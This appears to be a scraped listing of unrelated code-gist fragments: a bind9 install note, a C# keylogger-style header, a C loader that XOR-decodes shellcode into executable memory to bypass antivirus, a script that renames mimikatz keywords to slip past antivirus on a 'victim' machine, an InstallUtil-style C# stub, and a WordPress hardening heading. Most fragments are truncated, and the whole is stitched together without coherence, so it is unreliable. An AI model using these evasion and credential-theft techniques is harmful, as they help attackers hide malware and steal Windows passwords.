apt install bind9
Note: i have the IP : 192.168.1.109 by DHCP
edit the network settings file
using System; | |
using System.Diagnostics; | |
using System.IO; | |
using System.Net.Mail; | |
using System.Runtime.InteropServices; | |
using System.Text; | |
using System.Windows.Forms; | |
namespace KEY | |
{ |
/* source: http://www.attactics.org/2016/03/bypassing-antivirus-with-10-lines-of.html */ | |
#include <windows.h> | |
#include <iostream> | |
int main(int argc, char **argv) { | |
char b[] = {/* your XORd with key of 'x' shellcode goes here i.e. 0x4C,0x4F, 0x4C */}; | |
char c[sizeof b]; | |
for (int i = 0; i < sizeof b; i++) {c[i] = b[i] ^ 'x';} | |
void *exec = VirtualAlloc(0, sizeof c, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
memcpy(exec, c, sizeof c); |
# This script downloads and slightly "obfuscates" the mimikatz project. | |
# Most AV solutions block mimikatz based on certain keywords in the binary like "mimikatz", "gentilkiwi", "benjamin@gentilkiwi.com" ..., | |
# so removing them from the project before compiling gets us past most of the AV solutions. | |
# We can even go further and change some functionality keywords like "sekurlsa", "logonpasswords", "lsadump", "minidump", "pth" ...., | |
# but this needs adapting to the doc, so it has not been done, try it if your victim's AV still detects mimikatz after this program. | |
git clone https://github.com/gentilkiwi/mimikatz.git windows | |
mv windows/mimikatz windows/windows | |
find windows/ -type f -print0 | xargs -0 sed -i 's/mimikatz/windows/g' | |
find windows/ -type f -print0 | xargs -0 sed -i 's/MIMIKATZ/WINDOWS/g' |
using System; | |
using System.Net; | |
using System.Diagnostics; | |
using System.Reflection; | |
using System.Configuration.Install; | |
using System.Runtime.InteropServices; | |
/* | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause |
Securing WordPress using a combination of configuration changes and plugins.
wp-config.php